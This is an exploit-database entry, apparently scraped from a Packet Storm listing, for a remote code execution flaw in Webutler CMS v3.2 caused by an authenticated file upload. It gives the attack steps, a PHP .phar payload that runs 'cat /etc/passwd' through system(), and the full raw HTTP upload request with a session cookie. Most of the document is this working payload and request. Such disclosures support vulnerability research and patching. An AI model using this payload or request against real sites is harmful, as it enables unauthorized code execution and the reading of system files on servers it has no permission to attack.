Share
## https://sploitus.com/exploit?id=PACKETSTORM:173977
Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)  
Application: webutler Cms  
Version: v3.2  
Bugs: RCE  
Technology: PHP  
Vendor URL: https://webutler.de/en  
Software Link: http://webutler.de/download/webutler_v3.2.zip  
Date of found: 03.08.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
steps:   
1. login to account as admin  
2. go to visit media   
3.upload phar file  
4. upload poc.phar file  
  
poc.phar file contents :  
<?php echo system("cat /etc/passwd");?>  
5. Visit to poc.phar file  
poc request:  
  
POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1  
Host: localhost  
Content-Length: 40  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
X_FILENAME: poc.phar  
sec-ch-ua-platform: ""  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/webutler_v3.2/admin/browser/index.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu  
Connection: close  
  
<?php echo system("cat /etc/passwd");?>